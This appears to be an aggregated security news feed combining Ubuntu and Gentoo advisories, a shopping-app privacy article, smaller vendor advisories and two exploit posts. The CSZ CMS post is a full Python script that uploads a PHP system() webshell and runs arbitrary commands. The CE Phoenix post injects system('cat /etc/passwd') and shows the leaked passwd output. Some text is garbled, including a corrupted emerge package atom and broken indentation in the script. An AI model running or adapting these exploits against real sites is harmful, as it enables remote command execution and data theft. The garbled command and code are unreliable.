Ubuntu Security Notice 6515-1 - Multiple security issues were discovered in Thunderbird. If a user were tricked into opening a specially crafted website in a browsing context, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information, bypass security restrictions, cross-site tracing, or execute arbitrary code. It was discovered that Thunderbird did not properly manage memory when images were created on the canvas element. An attacker could potentially exploit this issue to obtain sensitive information.

=========================================================================  
Ubuntu Security Notice USN-6515-1  
November 27, 2023

thunderbird vulnerabilities  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in Thunderbird.

Software Description:  
- thunderbird: Mozilla Open Source mail and newsgroup client

Details:

Multiple security issues were discovered in Thunderbird. If a user were  
tricked into opening a specially crafted website in a browsing context, an  
attacker could potentially exploit these to cause a denial of service,  
obtain sensitive information, bypass security restrictions, cross-site  
tracing, or execute arbitrary code. (CVE-2023-6206, CVE-2023-6212)

It was discovered that Thudnerbird did not properly manage memory when  
images were created on the canvas element. An attacker could potentially  
exploit this issue to obtain sensitive information. (CVE-2023-6204)

It discovered that Thunderbird incorrectly handled certain memory when  
using a MessagePort. An attacker could potentially exploit this issue to  
cause a denial of service. (CVE-2023-6205)

It discovered that Thunderbird incorrectly did not properly manage ownership  
in ReadableByteStreams. An attacker could potentially exploit this issue  
to cause a denial of service. (CVE-2023-6207)

It discovered that Thudnerbird incorrectly did not properly manage copy  
operations when using Selection API in X11. An attacker could potentially  
exploit this issue to obtain sensitive information. (CVE-2023-6208)

Rachmat Abdul Rokhim discovered that Thunderbird incorrectly handled  
parsing of relative URLS starting with "///". An attacker could potentially  
exploit this issue to cause a denial of service. (CVE-2023-6209)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
  thunderbird                     1:115.5.0+build1-0ubuntu0.23.10.1

Ubuntu 23.04:  
  thunderbird                     1:115.5.0+build1-0ubuntu0.23.04.1

Ubuntu 22.04 LTS:  
  thunderbird                     1:115.5.0+build1-0ubuntu0.22.04.1

Ubuntu 20.04 LTS:  
  thunderbird                     1:115.5.0+build1-0ubuntu0.20.04.1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6515-1  
  CVE-2023-6204, CVE-2023-6205, CVE-2023-6206, CVE-2023-6207,  
  CVE-2023-6208, CVE-2023-6209, CVE-2023-6212

Package Information:  
  https://launchpad.net/ubuntu/+source/thunderbird/1:115.5.0+build1-0ubuntu0.23.10.1  
  https://launchpad.net/ubuntu/+source/thunderbird/1:115.5.0+build1-0ubuntu0.23.04.1  
  https://launchpad.net/ubuntu/+source/thunderbird/1:115.5.0+build1-0ubuntu0.22.04.1  
  https://launchpad.net/ubuntu/+source/thunderbird/1:115.5.0+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6515-1

Gentoo Linux Security Advisory 202311-17 - Multiple vulnerabilities have been discovered in phpMyAdmin, the worst of which allows for denial of service. Versions greater than or equal to 5.2.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-17  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: phpMyAdmin: Multiple Vulnerabilities  
     Date: November 26, 2023  
     Bugs: #831841, #835071  
       ID: 202311-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in phpMyAdmin, the worst  
of which allows for denial of service.

Background  
=========  
phpMyAdmin is a tool written in PHP intended to handle the  
administration of MySQL over the web.

Affected packages  
================  
Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
dev-db/phpmyadmin  < 5.2.0       >= 5.2.0

Description  
==========  
Multiple vulnerabilities have been discovered in phpMyAdmin. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All phpMyAdmin users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-db/phpmyadmin-5.2.0"

References  
=========  
[ 1 ] CVE-2022-0813  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0813  
[ 2 ] CVE-2022-23807  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23807  
[ 3 ] CVE-2022-23808  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23808

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-17

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-17

Gentoo Linux Security Advisory 202311-16 - Multiple denial of service vulnerabilities have been found in Open vSwitch. Versions greater than or equal to 2.17.6 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-16  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Open vSwitch: Multiple Vulnerabilities  
     Date: November 26, 2023  
     Bugs: #765346, #769995, #803107, #887561  
       ID: 202311-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple denial of service vulnerabilites have been found in Open  
vSwitch.

Background  
=========  
Open vSwitch is a production quality multilayer virtual switch.

Affected packages  
================  
Package               Vulnerable    Unaffected  
--------------------  ------------  ------------  
net-misc/openvswitch  < 2.17.6      >= 2.17.6

Description  
==========  
Multiple vulnerabilities have been discovered in Open vSwitch. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Open vSwitch users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-misc/openvswitch-2.17.6"

References  
=========  
[ 1 ] CVE-2020-27827  
      https://nvd.nist.gov/vuln/detail/CVE-2020-27827  
[ 2 ] CVE-2020-35498  
      https://nvd.nist.gov/vuln/detail/CVE-2020-35498  
[ 3 ] CVE-2021-3905  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3905  
[ 4 ] CVE-2021-36980  
      https://nvd.nist.gov/vuln/detail/CVE-2021-36980  
[ 5 ] CVE-2022-4337  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4337  
[ 6 ] CVE-2022-4338  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4338  
[ 7 ] CVE-2023-1668  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1668

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-16

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-16

Gentoo Linux Security Advisory 202311-15 - Multiple vulnerabilities have been discovered in LibreOffice, the worst of which could lead to code execution. Versions greater than or equal to 7.5.3.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-15  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: LibreOffice: Multiple Vulnerabilities  
     Date: November 26, 2023  
     Bugs: #908083  
       ID: 202311-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in LibreOffice, the worst  
of which could lead to code execution.

Background  
=========  
LibreOffice is a powerful office suite; its clean interface and powerful  
tools let you unleash your creativity and grow your productivity.

Affected packages  
================  
Package                     Vulnerable    Unaffected  
--------------------------  ------------  ------------  
app-office/libreoffice      < 7.5.3.2     >= 7.5.3.2  
app-office/libreoffice-bin  < 7.5.3.2     >= 7.5.3.2

Description  
==========  
Multiple vulnerabilities have been discovered in LibreOffice. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All LibreOffice binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-office/libreoffice-bin-7.5.3.2"

All LibreOffice users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-office/libreoffice-7.5.3.2"

References  
=========  
[ 1 ] CVE-2023-0950  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0950  
[ 2 ] CVE-2023-2255  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2255

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-15

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-15

CSZ CMS version 1.3.0 suffers from a remote command execution vulnerability. Exploit written in Python.

# Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution  
# Date: 17/11/2023  
# Exploit Author: tmrswrr  
# Vendor Homepage: https://www.cszcms.com/  
# Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download  
# Version: Version 1.3.0  
# Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS

import os  
import zipfile  
from selenium import webdriver  
from selenium.webdriver.common.by import By  
from selenium.webdriver.firefox.options import Options as FirefoxOptions  
from selenium.webdriver.firefox.service import Service as FirefoxService  
from webdriver_manager.firefox import GeckoDriverManager  
from selenium.webdriver.support.ui import WebDriverWait  
from selenium.webdriver.support import expected_conditions as EC  
from selenium.common.exceptions import NoSuchElementException, TimeoutException  
import requests  
from time import sleep  
import sys  
import random  
import time  
import platform  
import tarfile  
from io import BytesIO

email = "admin@admin.com"   
password = "password"

class colors:  
    OKBLUE = '\033[94m'  
    WARNING = '\033[93m'  
    FAIL = '\033[91m'  
    ENDC = '\033[0m'  
    BOLD = '\033[1m'  
    UNDERLINE = '\033[4m'  
    CBLACK = '\33[30m'  
    CRED = '\33[31m'  
    CGREEN = '\33[32m'  
    CYELLOW = '\33[33m'  
    CBLUE = '\33[34m'  
    CVIOLET = '\33[35m'  
    CBEIGE = '\33[36m'  
    CWHITE = '\33[37m'

color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,  
                colors.CRED, colors.CBEIGE]  
random.shuffle(color_random)

def entryy():  
    x = color_random[0] + """

╭━━━┳━━━┳━━━━╮╭━━━┳━╮╭━┳━━━╮╭━━━┳━━━┳━━━╮╭━━━┳━╮╭━┳━━━┳╮╱╱╭━━━┳━━┳━━━━╮  
┃╭━╮┃╭━╮┣━━╮━┃┃╭━╮┃┃╰╯┃┃╭━╮┃┃╭━╮┃╭━╮┃╭━━╯┃╭━━┻╮╰╯╭┫╭━╮┃┃╱╱┃╭━╮┣┫┣┫╭╮╭╮┃  
┃┃╱╰┫╰━━╮╱╭╯╭╯┃┃╱╰┫╭╮╭╮┃╰━━╮┃╰━╯┃┃╱╰┫╰━━╮┃╰━━╮╰╮╭╯┃╰━╯┃┃╱╱┃┃╱┃┃┃┃╰╯┃┃╰╯  
┃┃╱╭╋━━╮┃╭╯╭╯╱┃┃╱╭┫┃┃┃┃┣━━╮┃┃╭╮╭┫┃╱╭┫╭━━╯┃╭━━╯╭╯╰╮┃╭━━┫┃╱╭┫┃╱┃┃┃┃╱╱┃┃  
┃╰━╯┃╰━╯┣╯━╰━╮┃╰━╯┃┃┃┃┃┃╰━╯┃┃┃┃╰┫╰━╯┃╰━━╮┃╰━━┳╯╭╮╰┫┃╱╱┃╰━╯┃╰━╯┣┫┣╮╱┃┃  
╰━━━┻━━━┻━━━━╯╰━━━┻╯╰╯╰┻━━━╯╰╯╰━┻━━━┻━━━╯╰━━━┻━╯╰━┻╯╱╱╰━━━┻━━━┻━━╯╱╰╯

                <<   CSZ CMS Version 1.3.0 RCE     >>  
                <<      CODED BY TMRSWRR           >>  
                <<     GITHUB==>capture0x          >>

\n"""  
    for c in x:  
        print(c, end='')  
        sys.stdout.flush()  
        sleep(0.0045)  
    oo = " " * 6 + 29 * "░⣿" + "\n\n"  
    for c in oo:  
        print(colors.CGREEN + c, end='')  
        sys.stdout.flush()  
        sleep(0.0065)

    tt = " " * 5 + "░⣿" + " " * 6 + "WELCOME TO CSZ CMS Version 1.3.0 RCE Exploit" + " " * 7 + "░⣿" + "\n\n"  
    for c in tt:  
        print(colors.CWHITE + c, end='')  
        sys.stdout.flush()  
        sleep(0.0065)  
    xx = " " * 6 + 29 * "░⣿" + "\n\n"  
    for c in xx:  
        print(colors.CGREEN + c, end='')  
        sys.stdout.flush()  
        sleep(0.0065)

def check_geckodriver():  
    current_directory = os.path.dirname(os.path.abspath(__file__))  
    geckodriver_path = os.path.join(current_directory, 'geckodriver')

    if not os.path.isfile(geckodriver_path):  
        red = "\033[91m"  
        reset = "\033[0m"  
        print(red + "\n\nGeckoDriver (geckodriver) is not available in the script's directory." + reset)  
        user_input = input("Would you like to download it now? (yes/no): ").lower()  
        if user_input == 'yes':  
            download_geckodriver(current_directory)  
        else:  
            print(red + "Please download GeckoDriver manually from: https://github.com/mozilla/geckodriver/releases" + reset)  
            sys.exit(1)

def download_geckodriver(directory):

    print("[*] Detecting OS and architecture...")  
    os_name = platform.system().lower()  
    arch, _ = platform.architecture()

    if os_name == "linux":  
        os_name = "linux"  
        arch = "64" if arch == "64bit" else "32"  
    elif os_name == "darwin":  
        os_name = "macos"  
        arch = "aarch64" if platform.processor() == "arm" else ""  
    elif os_name == "windows":  
        os_name = "win"  
        arch = "64" if arch == "64bit" else "32"  
    else:  
        print("[!] Unsupported operating system.")  
        sys.exit(1)

    geckodriver_version = "v0.33.0"  
    geckodriver_file = f"geckodriver-{geckodriver_version}-{os_name}{arch}"  
    ext = "zip" if os_name == "win" else "tar.gz"  
    url = f"https://github.com/mozilla/geckodriver/releases/download/{geckodriver_version}/{geckodriver_file}.{ext}"

    print(f"[*] Downloading GeckoDriver for {platform.system()} {arch}-bit...")  
    response = requests.get(url, stream=True)

    if response.status_code == 200:  
        print("[*] Extracting GeckoDriver...")  
        if ext == "tar.gz":  
            with tarfile.open(fileobj=BytesIO(response.content), mode="r:gz") as tar:  
                tar.extractall(path=directory)  
        else:     
            with zipfile.ZipFile(BytesIO(response.content)) as zip_ref:  
                zip_ref.extractall(directory)  
        print("[+] GeckoDriver downloaded and extracted successfully.")  
    else:  
        print("[!] Failed to download GeckoDriver.")  
        sys.exit(1)

        def create_zip_file(php_filename, zip_filename, php_code):  
    try:  
        with open(php_filename, 'w') as file:  
            file.write(php_code)  
        with zipfile.ZipFile(zip_filename, 'w') as zipf:  
            zipf.write(php_filename)  
        print("[+] Zip file created successfully.")  
        os.remove(php_filename)  
        return zip_filename  
    except Exception as e:  
        print(f"[!] Error creating zip file: {e}")  
        sys.exit(1)

def main(base_url, command):

    if not base_url.endswith('/'):  
        base_url += '/'

            zip_filename = None   

    check_geckodriver()  
    try:  
        firefox_options = FirefoxOptions()  
        firefox_options.add_argument("--headless")

        script_directory = os.path.dirname(os.path.abspath(__file__))  
        geckodriver_path = os.path.join(script_directory, 'geckodriver')  
        service = FirefoxService(executable_path=geckodriver_path)  
        driver = webdriver.Firefox(service=service, options=firefox_options)  
        print("[*] Exploit initiated.")

        # Login  
        driver.get(base_url + "admin/login")  
        print("[*] Accessing login page...")  
        driver.find_element(By.NAME, "email").send_keys(f"{email}")  
        driver.find_element(By.NAME, "password").send_keys(f"{password}")  
        driver.find_element(By.ID, "login_submit").click()  
        print("[*] Credentials submitted...")

         try:  
            error_message = driver.find_element(By.XPATH, "//*[contains(text(), 'Email address/Password is incorrect')]")  
            if error_message.is_displayed():  
                print("[!] Login failed: Invalid credentials.")  
                driver.quit()  
                sys.exit(1)  
        except NoSuchElementException:  
            print("[+] Login successful.")

        # File creation    
        print("[*] Preparing exploit files...")  
        php_code = f"<?php echo system('{command}'); ?>"  
        zip_filename = create_zip_file("exploit.php", "payload.zip", php_code)

         driver.get(base_url + "admin/upgrade")  
        print("[*] Uploading exploit payload...")  
        file_input = driver.find_element(By.ID, "file_upload")  
        file_input.send_keys(os.path.join(os.getcwd(), zip_filename))

    # Uploading  
        driver.find_element(By.ID, "submit").click()  
        WebDriverWait(driver, 10).until(EC.alert_is_present())  
        alert = driver.switch_to.alert  
        alert.accept()

        # Exploit result   
        exploit_url = base_url + "exploit.php"  
        response = requests.get(exploit_url)  
        print(f"[+] Exploit response:\n\n{response.text}")

    except Exception as e:  
        print(f"[!] Error: {e}")  
    finally:  
        driver.quit()  
        if zip_filename and os.path.exists(zip_filename):  
            os.remove(zip_filename)

if __name__ == "__main__":  
    entryy()  
    if len(sys.argv) < 3:  
        print("Usage: python script.py [BASE_URL] [COMMAND]")  
    else:  
        main(sys.argv[1], sys.argv[2])

CSZ CMS 1.3.0 Remote Command Execution

CE Phoenix version 1.0.8.20 suffers from an authenticated remote command execution vulnerability.

    ## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated)#### Date: 2023-11-25#### Exploit Author: tmrswrr#### Category: Webapps#### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/)#### Version: v1.0.8.20#### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix)### POC:<img src="https://raw.githubusercontent.com/capture0x/Phoenix/main/1.png" alt="Magento Image" width="1000"><img src="https://raw.githubusercontent.com/capture0x/Phoenix/main/2.png" alt="Magento Image" width="1000">1. **Login to admin panel:**     - Visit: `https://demos6.softaculous.com/CE_Phoenixvkqhcarjmw/admin/define_language.php?lngdir=english`    2. **Access english.php:**    - Click on `english.php` and inject the payload:     ```    <?php echo system('cat /etc/passwd'); ?>    ```    3. **Save Changes:**    - Save the modified file.4. **View Results:**    - Visit the main page: `https://demos6.softaculous.com/CE_Phoenixvkqhcarjmw/`    - You will see the following result:root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologinsystemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologinsystemd-network:x:192:192:systemd Network Management:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinpolkitd:x:998:997:User for polkitd:/:/sbin/nologintss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinpostfix:x:89:89::/var/spool/postfix:/sbin/nologinchrony:x:997:995::/var/lib/chrony:/sbin/nologinsoft:x:1000:1000::/home/soft:/sbin/nologinsaslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinemps:x:995:1001::/home/emps:/bin/bashnamed:x:25:25:Named:/var/named:/sbin/nologinexim:x:93:93::/var/spool/exim:/sbin/nologinvmail:x:5000:5000::/var/local/vmail:/bin/bashmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/falsewebuzo:x:993:993::/home/webuzo:/bin/bashapache:x:992:991::/home/apache:/sbin/nologinapache:x:992:991::/home/apache:/sbin/nologin

CE Phoenix 1.0.8.20 Remote Command Execution

By Deeba Ahmed
Amazon and eBay have been declared the highest data-collecting platforms among all the Android shopping apps researchers examined.
This is a post from HackRead.com Read the original post: Study Finds Amazon, eBay and Afterpay as Top Android User Data Collectors

As per Atlas VPN’s research, besides Amazon, eBay, and Afterpay, other popular apps were also found to be sharing personal details and financial data with third parties.

To shop for Black Friday and Cyber Monday, most users turn to smartphones and tablets to secure the best deals. However, it is essential to be aware of potential risks, such as how various vendors collect your data, to navigate the shopping season safely.

According to the latest research conducted by the Atlas VPN team, numerous leading online shopping platforms collect sensitive user data, with some going as far as sharing this **information with third parties** without the users’ knowledge.

The platforms underwent assessment across various data collection categories, encompassing personal details, financial information, and user geolocation. The evaluated data points included the user’s name, phone number, payment method, and precise location, which were further categorized into extended data types for more in-depth analysis.

In addition, Atlas VPN researchers assessed the Google Play app profiles of the 60 most popular Android apps within the shopping category. The apps were ranked according to the number of user information data points collected.

The researchers chose apps from App Figures’ top Android shopping app charts for 2023 for their analysis. The charts comprised various apps, including shopping, buy now and pay later, and discount offer apps. Researchers have shared their list of the year’s top 15 highest-user data-collecting apps.

According to their **report**, Amazon and eBay have been declared the highest data-collecting platforms among all the Android shopping apps researchers examined. Reportedly, eBay collects 28 user data points, and Amazon collects 25.

The popular buy-now app Afterpay was the third-highest data collecting platform with 22 data points against 7 data types. It was the only identified app that didn’t just collect data but also shared sensitive data such as in-app messages, emails, SMS messages, and credit scores with third parties.

Next were Home Improvement retailer Lowe’s health retail platform iHerb and Vinted, a secondhand products marketplace. Each collected 21 data points. Chinese e-comm website Alibaba and home goods giant Home Depot collected 20 data points across 9 data types. Poshmark, another secondhand goods retailer, collected significant user data with 19 data points in 7 categories.

The rest of the apps included Nike, Wayfair, OfferUp, Craigslist, ASOS, and H&M apps, each collecting 18 data points. Among the 60 apps examined by Atlas VPN, Kohl’s app didn’t collect any data. A staggering 75% of the apps share user data with third parties. For instance, 52% and 38% of apps shared app activity, app info, and performance data, typically used to enhance user experience. 

Moreover, 58% of the apps shared personal data like names, home addresses, email IDs, and phone numbers with third parties. A whopping 25% of these apps shared device IDs or other unique identifiers for smartphones and tablets.

Around one-third, or 37%, of the apps disclosed financial data, including purchase history and payment details, whereas 28% shared location data with external sources. The extent of data sharing among Android shopping apps is alarming and a threat to user privacy.

Cybersecurity writer at Atlas VPN, Vilius Kardelis, shared his thoughts on shopping app data collection with Hackread.com, stating that:

“In today’s digital age, your personal information is being extensively collected by apps and shared with countless firms. This holiday season, approach all apps aware your data is being collected. Take the time to carefully read privacy policies, be mindful of the permissions you grant, and prioritize safe shopping practices to safeguard your personal information.”

****Surprised? Don’t be!****

Smartphone apps are designed to collect user data, and the extent and duration of this collection are subjects of debate. Contrarily, data collection and sharing constitute a lucrative business for technology giants.

**In 2021,** researchers claimed that Android sends more data to Google than iOS does to Apple. The research suggested that Android devices collect and transmit twice as much data to Google compared to iOS to Apple. However, Google refuted these findings.

In August of last year, researchers compiled a list of the 10 Android Educational Apps that collect the most user data. The list, **available here**, includes some of the most prominent and widely used Android apps globally.

****Conclusion:****

There isn’t much one can do to prevent apps from collecting data. However, if you are an Android user, consider downloading apps only after reviewing the section on the Play Store that details the data the app collects.

1.  **Fake GitHub Repos Delivering Malware as PoCs**
2.  **Google kicks out 600 malicious apps from Play Store**
3.  **Apple removed all major VPN apps from Chinese App Store**
4.  **Google removes ClearURLs Chrome extension from its store**
5.  **Google Fails To Remove “App Developer” Behind Malware Scam**

Study Finds Amazon, eBay and Afterpay as Top Android User Data Collectors

Sensitive data exposure in Webconf in Tribe29 Checkmk Appliance before 1.6.8 allows local attacker to retrieve passwords via reading log files.

When restoring a backup the passphrase is submitted. The form used the GET method so the passphrase was logged to the apache access log.

We found this vulnerability internally.

**Indicators of Compromise**: Check /var/log/apache2/access.log for occurences of passphrase

**Vulnerability Management**: We have rated the issue with a CVSS Score of 3.3 (Low) with the following CVSS vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N. We assigned CVE-2023-6287 to this vulnerability.

**Changes**: With this Werk the method is changed to POST so it will no longer be logged.

To the list of all Werks

CVE-2023-6287: Use POST for starting backup restore job

Mattermost fails to use innerText / textContent when setting the channel name in the webapp during autocomplete, allowing an attacker to inject HTML to a victim's page by create a channel name that is valid HTML. No XSS is possible though.

**Mattermost Injection vulnerability**

Low severity GitHub Reviewed Published Nov 27, 2023 to the GitHub Advisory Database • Updated Nov 28, 2023

GHSA-jcgv-3pfq-j4hr: Mattermost Injection vulnerability

A vulnerability, which was classified as critical, was found in moses-smt mosesdecoder up to 4.0. This affects an unknown part of the file contrib/iSenWeb/trans_result.php. The manipulation of the argument input1 leads to os command injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-246135.

Tag

#web